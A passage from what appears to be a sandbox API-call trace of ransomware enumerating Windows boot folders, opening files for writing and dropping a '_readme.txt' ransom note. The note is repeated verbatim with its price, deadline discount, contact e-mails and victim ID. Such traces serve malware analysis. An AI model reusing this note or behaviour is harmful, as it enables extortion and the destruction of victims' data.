tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0188.314] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e77f68 [0188.314] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\_readme.txt" (normalized: "c:\\boot\\ja-jp\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.314] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e77f68 | out: hHeap=0x620000) returned 1 [0188.315] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0188.315] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.315] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*" (normalized: "c:\\boot\\ja-jp\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0188.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.316] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0188.316] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0188.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0188.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.316] PathFindExtensionW (pszPath="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned=".mui" [0188.316] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.319] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0188.319] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0188.319] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0188.320] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.320] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0188.320] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0188.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0188.320] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0188.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.321] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.321] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.322] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.322] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.322] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.322] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.322] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.323] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.323] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.323] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.323] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.323] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.323] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.324] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.324] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.324] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.324] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.324] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0188.325] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.325] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.325] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.325] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.325] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0188.325] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.326] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.326] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.326] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.326] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.326] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.327] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.327] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.327] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0188.327] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.327] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.327] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.327] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0188.328] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.328] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.328] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.328] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0188.329] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.329] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.329] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.329] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.329] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.330] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.330] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.330] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.330] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.330] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.331] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.331] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0188.331] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.331] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.331] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.331] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0188.332] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.332] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.332] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.332] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.332] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.333] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.333] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.333] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.333] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.334] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.334] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.334] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.334] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.334] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.335] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.335] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.335] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.335] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.335] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.336] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.336] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.337] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.337] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.337] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.337] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.337] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0188.337] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.338] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.338] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.338] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.339] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.339] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.339] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0188.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.340] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.340] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0188.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.340] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.340] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0188.341] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.341] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.341] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.341] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.341] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.342] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.342] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.342] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.342] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.342] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.342] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.342] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.342] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0188.343] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.343] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.343] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.343] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.343] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0188.344] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.344] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.344] PathFindFileNameW (pszPath="C:\\Boot\\ko-KR\\") returned="ko-KR\\" [0188.344] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0188.345] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f98 | out: hHeap=0x620000) returned 1 [0188.345] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0188.345] PathFindFileNameW (pszPath="") returned="" [0188.345] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x74ff0000 [0188.345] GetProcAddress (hModule=0x74ff0000, lpProcName="SHGetFolderPathW") returned 0x75075708 [0188.345] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2e902a8 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0188.346] FreeLibrary (hLibModule=0x74ff0000) returned 1 [0188.346] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.346] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.346] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.346] PathAppendW (in: pszPath="C:\\Boot\\ko-KR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ko-KR\\_readme.txt") returned 1 [0188.346] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.346] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.346] PathFileExistsW (pszPath="C:\\Boot\\ko-KR\\_readme.txt") returned 0 [0188.346] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x2e96a68 [0188.347] lstrcpyW (in: lpString1=0x2e96a68, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0188.347] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") 